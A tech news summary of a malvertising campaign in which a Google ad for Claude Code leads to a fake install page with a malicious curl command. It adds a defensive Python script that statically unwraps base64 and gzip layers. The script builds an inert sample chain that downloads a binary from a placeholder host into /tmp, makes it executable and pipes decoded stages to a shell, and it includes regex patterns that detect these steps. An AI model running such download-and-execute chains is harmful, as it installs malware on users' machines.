BotBeat

Google / Alphabet | POLICY & REGULATION | 2026-02-26

Google Serves Malware Through Fake Claude Code Ad in Top Search Result

Key Takeaways

  • A malicious ad for Claude Code appears at the top of Google search results, directing users to a fake installation site that closely mimics Anthropic's legitimate website
  • The malware uses a multi-layered delivery system with base64 encoding, gzip compression, and remote executable downloads to evade detection
  • The attack exploits developers' trust in curl-based installation commands, a common practice in software development

Source: Hacker News, https://minimumviableposts.substack.com/p/google-is-serving-straight-up-malware

Summary

Security researcher Adam Geitgey has discovered that Google is serving malware disguised as Claude Code installation instructions through a paid advertisement appearing at the top of search results. When users search for "download claude code," they encounter an ad linking to a fake website that mimics Anthropic's legitimate Claude Code site. The malicious site tricks users into running a compromised curl command that downloads and executes multiple layers of encoded malware payloads.

The attack specifically targets developers' trust in command-line installation processes, modifying the legitimate installation command with a malicious URL. The payload chain includes base64-encoded scripts and gzip files that ultimately download an executable from a known malicious domain and install it at /tmp/helper. The binary has been flagged on multiple malware reporting sites, though its exact payload remains unclear.
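The layered chain described above can be inspected without running it. The following is an added example, not code from the original report or from Anthropic: a static unwrapper that peels base64 and gzip layers from a pasted install script and flags pipe-to-shell, decode-and-run, and executables made runnable under /tmp. The sample script, its `payload.example.invalid` URL, and all function and rule names are constructed for illustration.

```python
import base64, gzip, re, zlib

MAX_BYTES = 1 << 20  # cap each decoded layer (guards against decompression bombs)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s\"'|;)]+")
# Heuristics for the behaviours the summary describes (rule names are this example's own).
SUSPICIOUS = {
    "pipe-to-shell": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "decode-and-run": re.compile(r"base64\s+(?:-d|-D|--decode)\b"),
    "tmp-executable": re.compile(r"chmod\s+\+x\s+/tmp/"),
}

def unwrap(text, max_depth=5):
    """Peel base64 and gzip layers statically; nothing is ever executed."""
    layers = [text]
    for _ in range(max_depth):
        blob = max(B64_RUN.findall(layers[-1]), key=len, default=None)
        if blob is None:
            break
        try:
            raw = base64.b64decode(blob, validate=True)
            if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
                raw = zlib.decompressobj(wbits=31).decompress(raw, MAX_BYTES)
            layers.append(raw[:MAX_BYTES].decode("utf-8"))
        except (ValueError, zlib.error):
            break  # not valid base64, gzip or text (e.g. a binary): stop here
    return layers

def triage(script):
    """Report layer count, matched heuristics per depth, and every URL seen."""
    layers = unwrap(script)
    findings = [(depth, name) for depth, layer in enumerate(layers)
                for name, rx in SUSPICIOUS.items() if rx.search(layer)]
    urls = sorted({u for layer in layers for u in URL.findall(layer)})
    return {"layers": len(layers), "findings": findings, "urls": urls}

def make_sample():
    """Constructed, inert sample shaped like the chain in the summary."""
    inner = ("curl -s -o /tmp/helper https://payload.example.invalid/helper\n"
             "chmod +x /tmp/helper\n")
    gz = base64.b64encode(gzip.compress(inner.encode())).decode()
    stage2 = f"echo '{gz}' | base64 -d | gunzip | sh\n"
    b64 = base64.b64encode(stage2.encode()).decode()
    return f"echo '{b64}' | base64 -d | sh\n"

if __name__ == "__main__":
    print(triage(make_sample()))
```

The same `triage` call can be pointed at the text of any install script saved to disk before it is piped to a shell.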

This incident highlights ongoing vulnerabilities in Google's advertising verification process, particularly for technical products where users are expected to execute terminal commands. As of the report's publication, the malicious advertisement remained active on Google Search. The case underscores the difficulty users face in reporting security issues to Google and raises questions about the tech giant's responsibility to protect users from sophisticated malware delivery through its advertising platform.

  • The malicious advertisement was still active at the time of reporting, with no clear mechanism for users to report such issues to Google
AI Agents, Cybersecurity, Marketing & Advertising, Ethics & Bias, Privacy & Data
